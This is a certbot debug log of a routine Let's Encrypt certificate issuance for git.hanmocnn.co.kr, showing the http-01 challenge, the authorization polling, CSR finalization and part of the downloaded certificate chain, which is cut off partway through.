2026-02-15 01:51:51,206:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
2026-02-15 01:51:51,207:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0
2026-02-15 01:51:51,208:DEBUG:acme.client:JWS payload:
b'{}'
2026-02-15 01:51:51,212:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2Qm4wdzlxZndaaExxU0F5TEw2cE9LSWxGbkY3RnZnaFNRZU4zVEs3amIwV00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2L1dCY1lSUSJ9",
"signature": "NBWiYVLMnqzqVjVd9e2EOtYQIaoXr58024Qvuw6w-bluVIrcYqsRzjqIYI6xMcmuOAArmP0ARse7Fe7Nfdv0y6XvMQqhZyX3ttOp3LzCKLKARrz0ze-VI6Qit6OhFHUb-4M8ly-bU50uETtv-suWUD2N7mzTPHgJYsV4bCnNw-06YfRev5KGyu-pkZnXb_5BkbvAVqLCWGZpHLZ9P2maQSK38isRzRRvg_Yph53XTkm7_Apt48RvyciOSvRpxT0y4GitmuL_S6kqaiJUJnsQXAi8iZT6AlNd4JfWgy-IKNd-pLeJML9Jp5Ml6VMEY8cjpGbC4rvRAEO4ghJ_gMNV2A",
"payload": "e30"
}
2026-02-15 01:51:51,374:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658839462036/WBcYRQ HTTP/1.1" 200 195
2026-02-15 01:51:51,375:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:51:51 GMT
Content-Type: application/json
Content-Length: 195
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036>;rel="up"
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ
Replay-Nonce: NeKnt8TGCVoX15XqxHcH8EwLY7mU0fhc5iu-W8E95dWPI9_TGIQ
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
"status": "pending",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
}
2026-02-15 01:51:51,375:DEBUG:acme.client:Storing nonce: NeKnt8TGCVoX15XqxHcH8EwLY7mU0fhc5iu-W8E95dWPI9_TGIQ
2026-02-15 01:51:51,376:INFO:certbot._internal.auth_handler:Waiting for verification...
2026-02-15 01:51:52,376:DEBUG:acme.client:JWS payload:
b''
2026-02-15 01:51:52,381:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0NWb1gxNVhxeEhjSDhFd0xZN21VMGZoYzVpdS1XOEU5NWRXUEk5X1RHSVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0",
"signature": "N6i0RDdH_G5bVERBFzfAVluCZhhP2xSxxI7hxgoPJMPZM70W3Qh9XWQE_nhQ4MKRuTmMeWT8tCk6bd-EJaengkWN1gNIVvO52HigUYqZaIMF0GD0nbk4IBchm-fSbmP6-iypz0l-NiOwVQlQ-bzcZpjzaEXaJJ0UN42bJNKwuri_JGsg1plUK0tryOkH5prUI1Uie21HHJI41SGT02mUBsPRGR6Ef3xAVPjNYJUt73iG780B6fQgYxz81h_P2tFI5-BKzLq-Z6k2S_dDbE4qvRmB6yGEyhMa32myHj_uvGTviXnkUeCN145_rVW-uwTyMc3xf78O6bSK-eNPW-A2nA",
"payload": ""
}
2026-02-15 01:51:52,540:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 826
2026-02-15 01:51:52,541:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:51:52 GMT
Content-Type: application/json
Content-Length: 826
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: 4AH-2vvB1NFpJwJJf_Ae4W9KuOSW8LOksIsULxEYip-Juqi8PIQ
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "git.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-22T01:51:50Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
"status": "pending",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/muacBg",
"status": "pending",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ",
"status": "pending",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
}
]
}
2026-02-15 01:51:52,541:DEBUG:acme.client:Storing nonce: 4AH-2vvB1NFpJwJJf_Ae4W9KuOSW8LOksIsULxEYip-Juqi8PIQ
2026-02-15 01:51:52,542:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ', 'status': 'pending', 'token': 'lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0'}
2026-02-15 01:51:55,542:DEBUG:acme.client:JWS payload:
b''
2026-02-15 01:51:55,547:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QjFORnBKd0pKZl9BZTRXOUt1T1NXOExPa3NJc1VMeEVZaXAtSnVxaThQSVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0",
"signature": "aeilg5d0s3qXqzNgy5o4cI0bUyNxIYqVvjXF8tvdBmsE1iUpYFYWDzXl7oEmAxua5q8E2U6JkBHdgPJ_vsZd3z6B_557GAG1AVnOQacxvVpHLkvw-m8BVVYkonCM19Fb0NbYRJHfhNGXn_EnoiXmuOfkcdBmjk-7vj3lT2tPcjQTNBdJu7i6QZHdP5ucPjJYSbRzZbd_LLI385LPvFmgAZBlCL_0dYBUNrP2uqNF45WNaceJUqIjYyUb5tRGF4xjXqcQD2rg2EndgVKCEHRF2fTheOjD-2jeoADDgf0E6OC8eVc704K_vASf6nsVQPnof9U3A8EjijoEH1a6kpsxEQ",
"payload": ""
}
2026-02-15 01:51:55,717:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 826
2026-02-15 01:51:55,718:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:51:55 GMT
Content-Type: application/json
Content-Length: 826
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: 4AH-2vvB61k-bHUD2nLTVwKznjz8siFeraoWuDQ8EfVBNIm65n0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "git.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-22T01:51:50Z",
"challenges": [
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ",
"status": "pending",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/muacBg",
"status": "pending",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
"status": "pending",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
}
]
}
2026-02-15 01:51:55,718:DEBUG:acme.client:Storing nonce: 4AH-2vvB61k-bHUD2nLTVwKznjz8siFeraoWuDQ8EfVBNIm65n0
2026-02-15 01:51:55,719:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ', 'status': 'pending', 'token': 'lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0'}
2026-02-15 01:51:58,719:DEBUG:acme.client:JWS payload:
b''
2026-02-15 01:51:58,724:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QjYxay1iSFVEMm5MVFZ3S3puano4c2lGZXJhb1d1RFE4RWZWQk5JbTY1bjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0",
"signature": "Bf3p3q3x5ird5lIrcYEqZFpBjd7vZp3yT_VhYkDIOkm40183LdxR5LDHsSfrKxFeqKdRBQuPfUuCpRBrelnYNi9o0Cd0QAIPiX1Hi42d66kJxgRyXfK7RdoJCU-Uz-mxqdjjyfNccdvfMLw5q1G3h0_OIF9uG9aqgvzfiHlqRjkgWCKssljiK8inROYYBdnwagXLY8pczDgBBTkFixYe5jWERqNy707OWr8221oirH7pLJOKPKHhX3auh83Ag7sYCJjdfRQQy23T4aO361QbGoc-iDQaJh0OdffiwWcK9eXDZcsnffnAmw-fOcPfkAGQ7dFFp_ID4nRtUVGseutg7g",
"payload": ""
}
2026-02-15 01:51:58,935:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 777
2026-02-15 01:51:58,936:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:51:58 GMT
Content-Type: application/json
Content-Length: 777
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: NeKnt8TGIbNKaCBMKC63TiK-p6jRjvD008EcbuzJwDcYDsYMei8
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "git.hanmocnn.co.kr"
},
"status": "valid",
"expires": "2026-03-17T01:51:57Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
"status": "valid",
"validated": "2026-02-15T01:51:51Z",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0",
"validationRecord": [
{
"url": "http://git.hanmocnn.co.kr/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0",
"hostname": "git.hanmocnn.co.kr",
"port": "80",
"addressesResolved": [
"222.117.41.51"
],
"addressUsed": "222.117.41.51"
}
]
}
]
}
2026-02-15 01:51:58,937:DEBUG:acme.client:Storing nonce: NeKnt8TGIbNKaCBMKC63TiK-p6jRjvD008EcbuzJwDcYDsYMei8
2026-02-15 01:51:58,937:DEBUG:certbot._internal.error_handler:Calling registered functions
2026-02-15 01:51:58,937:INFO:certbot._internal.auth_handler:Cleaning up challenges
2026-02-15 01:51:58,938:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0
2026-02-15 01:51:58,938:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
2026-02-15 01:51:58,938:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKDCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE3ZB1deeblgoVMoPU\nK2iFU5FbwLKFHWK/JtLfmdLhuzQRDtQMR3pV5A4W8NWINvFWEcWdRH2Rqv0uIwWe\nsQZYRHcCcCGIZvYcF+dmwsZ1jLge9RSo/+kLdhLXyZ754afZoDAwLgYJKoZIhvcN\nAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0E\nAwIDaAAwZQIwaW490qutHUvSKLq5U2DIOTyCJERSKZFL13USO3MYRJbSBz11vK7r\nAgJ7e4qKXzqWAjEA8ONFmEjWmt2839uiJ6vbkLL7Jq5n2Uh8a9LdcNA5cybkohXZ\n0tSqH7xYtqphQHJK\n-----END CERTIFICATE REQUEST-----\n', form='pem')
2026-02-15 01:51:58,939:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-15 01:53:28.939521
2026-02-15 01:51:58,940:DEBUG:acme.client:JWS payload:
b'{\n "csr": "MIIBKDCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE3ZB1deeblgoVMoPUK2iFU5FbwLKFHWK_JtLfmdLhuzQRDtQMR3pV5A4W8NWINvFWEcWdRH2Rqv0uIwWesQZYRHcCcCGIZvYcF-dmwsZ1jLge9RSo_-kLdhLXyZ754afZoDAwLgYJKoZIhvcNAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0EAwIDaAAwZQIwaW490qutHUvSKLq5U2DIOTyCJERSKZFL13USO3MYRJbSBz11vK7rAgJ7e4qKXzqWAjEA8ONFmEjWmt2839uiJ6vbkLL7Jq5n2Uh8a9LdcNA5cybkohXZ0tSqH7xYtqphQHJK"\n}'
2026-02-15 01:51:58,944:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0liTkthQ0JNS0M2M1RpSy1wNmpSanZEMDA4RWNidXpKd0RjWURzWU1laTgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwNDA4ODIwOTg2In0",
"signature": "Ukf2rgjKwRIhy_p0rhlecNFkjSaEyuOoxgZ3lO2zYspObZ2xUft9pdZkpYYeBBPZijLo0z_BjPzUZxKi7da69adu2bVbHRmMEVtlilSY346fAU7oo4NUl8Vs7db33H4FeM623R-EGnTozPzeVAu6nzAwlzg5q7LUSjXy_fEP1f7u1mDDI8o81qnEhmje-UiLRAVsYg88gNf_NIo3Bhfb5tyPcJV12OXHxnGo-4Yisd3IH-x5k0aVzKp6CZ6wgW70Lgtx6cW222yUrk-3MBSFBO3n5WGn2e1dKX0tBqiYcuEoqrSH8qf50bIL41g8ty5SjzONuyIUo_KUaLTIRUZBZw",
"payload": "ewogICJjc3IiOiAiTUlJQktEQ0Jyd0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFM1pCMWRlZWJsZ29WTW9QVUsyaUZVNUZid0xLRkhXS19KdExmbWRMaHV6UVJEdFFNUjNwVjVBNFc4TldJTnZGV0VjV2RSSDJScXYwdUl3V2VzUVpZUkhjQ2NDR0ladlljRi1kbXdzWjFqTGdlOVJTb18ta0xkaExYeVo3NTRhZlpvREF3TGdZSktvWklodmNOQVFrT01TRXdIekFkQmdOVkhSRUVGakFVZ2hKbmFYUXVhR0Z1Ylc5amJtNHVZMjh1YTNJd0NnWUlLb1pJemowRUF3SURhQUF3WlFJd2FXNDkwcXV0SFV2U0tMcTVVMkRJT1R5Q0pFUlNLWkZMMTNVU08zTVlSSmJTQnoxMXZLN3JBZ0o3ZTRxS1h6cVdBakVBOE9ORm1FaldtdDI4Mzl1aUo2dmJrTEw3SnE1bjJVaDhhOUxkY05BNWN5YmtvaFhaMHRTcUg3eFl0cXBoUUhKSyIKfQ"
}
2026-02-15 01:52:01,344:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480408820986 HTTP/1.1" 200 454
2026-02-15 01:52:01,344:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:52:01 GMT
Content-Type: application/json
Content-Length: 454
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986
Replay-Nonce: 4AH-2vvBzRXHMbksCZ9MitMQBxuAI6PDVAP-3e54n20kYQvuOz0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "valid",
"expires": "2026-02-22T01:51:50Z",
"identifiers": [
{
"type": "dns",
"value": "git.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986",
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a"
}
2026-02-15 01:52:01,345:DEBUG:acme.client:Storing nonce: 4AH-2vvBzRXHMbksCZ9MitMQBxuAI6PDVAP-3e54n20kYQvuOz0
2026-02-15 01:52:02,345:DEBUG:acme.client:JWS payload:
b''
2026-02-15 01:52:02,350:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QnpSWEhNYmtzQ1o5TWl0TVFCeHVBSTZQRFZBUC0zZTU0bjIwa1lRdnVPejAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwNDA4ODIwOTg2In0",
"signature": "jIOWDfbpSclKLuMx3QNoqmW8J4i1EJ1IYnOzI3eV2bSQkEFKG5OE5NOnL72UA1PpQZnlvc95NYjxoW2tjBlXQKKHAqoAmiq0ivoAQhb14KcV8TZKs7QqG6_broa6iXrBUHpEzK4njjtDoDYwczCt-lQgLNczaflbLBsAX-BkoGSQRYyg4NxblkbT-gGYqd5r5WKCDahRQS4jXSF0pyY8Nym6dipk5JVWoRqqRGWzMpcvLtArLqdJTT2aHdWLP4FfO79_eASLhRHb-65Hbzqvel0OAXDKf1oFlIQqOpyxyvXU4EeSkVTfo15TIPn8gwwWGuPrJicVtj-OX0uFIJywRw",
"payload": ""
}
2026-02-15 01:52:02,549:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480408820986 HTTP/1.1" 200 454
2026-02-15 01:52:02,550:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:52:02 GMT
Content-Type: application/json
Content-Length: 454
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986
Replay-Nonce: NeKnt8TGkqXwrDlo3sRFrYaf3v4XwpOPFLYdKHKI5vRZk1dZOn0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "valid",
"expires": "2026-02-22T01:51:50Z",
"identifiers": [
{
"type": "dns",
"value": "git.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986",
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a"
}
2026-02-15 01:52:02,551:DEBUG:acme.client:Storing nonce: NeKnt8TGkqXwrDlo3sRFrYaf3v4XwpOPFLYdKHKI5vRZk1dZOn0
2026-02-15 01:52:02,551:DEBUG:acme.client:JWS payload:
b''
2026-02-15 01:52:02,555:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2txWHdyRGxvM3NSRnJZYWYzdjRYd3BPUEZMWWRLSEtJNXZSWmsxZFpPbjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU0ZTM2ZTlmNDJhYWJhZjcwMzg3NDE4YjYyYWY5YjJhZTlhIn0",
"signature": "nz8-mSztJHODU29TN2pD_L46rJK8QVsmtb1_QbSXQRyk754h8k1Q8XSnP8tzOcKtA395gCZWX3hP1oeBxnjUOFM8tT7jBT41GP5BjL0Qvy5xhReAiIX4e6JKtAcV8p4ooW8vBLwhPao8NkebadKwRSN5XzprOAvEQnzUN7mMrTykTRPSl81nkAVg0I5iD8y8PqS16ZrlpJdaeuECh_YnZVAiA64Q1bUY1vOCfY6z655MlhdxGOhE1EziZRjFrWR8zAXsSO5r_5lMd04JUujOK7bR_PVNdgWHirPx-KwaaOIzghYgbG86saj_I7oK-54fxmZCoc-jX2rQ5zeZSduHUw",
"payload": ""
}
2026-02-15 01:52:02,716:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a HTTP/1.1" 200 2893
2026-02-15 01:52:02,717:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:52:02 GMT
Content-Type: application/pem-certificate-chain
Content-Length: 2893
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a/1>;rel="alternate"
Replay-Nonce: NeKnt8TGUmr5hRmt5v4kyV_zjaCxjD5GACGBv7voiKKjqOzNOfw
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
-----BEGIN CERTIFICATE-----
MIIDpTCCAyugAwIBAgISBU426fQqq69wOHQYtir5sq6aMAoGCCqGSM49BAMDMDIx
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
NzAeFw0yNjAyMTUwMDUzMjlaFw0yNjA1MTYwMDUzMjhaMB0xGzAZBgNVBAMTEmdp
dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABN2QdXXnm5YK
FTKD1CtohVORW8CyhR1ivybS35nS4bs0EQ7UDEd6VeQOFvDViDbxVhHFnUR9kar9
LiMFnrEGWER3AnAhiGb2HBfnZsLGdYy4HvUUqP/pC3YS18me+eGn2aOCAhcwggIT
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
AjAAMB0GA1UdDgQWBBRaL2bTWA0MjQBBBgZygk0nxCro8jAfBgNVHSMEGDAWgBSu
SJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
Fmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
dHA6Ly9lNy5jLmxlbmNyLm9yZy8yNy5jcmwwggEFBgorBgEEAdZ5AgQCBIH2BIHz
APEAdwBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxe/1qdAAAE
AwBIMEYCIQDwNplXasmzKSLIez7kR/jYwBmY+92fo0Oe9xTRW/LYwQIhALQ+kEkk
pUvSpkEcvMoHJVABdfGiHZZbWkgt7CSOPBySAHYAFoMtq/CpJQ8P8DqlRf/Iv8gj
0IdL9gQpJ/jnHzMT9foAAAGcXv9irwAABAMARzBFAiBKJHYXSD4GUqumXq5TLt3A
HS9ZM08kl/NzaSz0eNoTAgIhAMldLvgzn+UR9VyLT3n2KT6n82wIo035yLwnogk5
KY/lMAoGCCqGSM49BAMDA2gAMGUCMQDBWHS4t+nwA0lkvbQcsUqQq3uabapszHs1
ZVOVAO4J+Vfx3wgTRO8Dx8F33rBWndYCMGC0CN463ukm+NgQt/ByckZ2/rxaUm9S
AhNC3oI5CvlMIrXyWD67+cCSiTNiQIuD7A==
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw
TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh
cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw
WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg
RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST
CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef
QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw
gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4
wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB
AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g
BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu
Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD
aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF
h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG
yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr
OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o
yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S
M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ
UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq
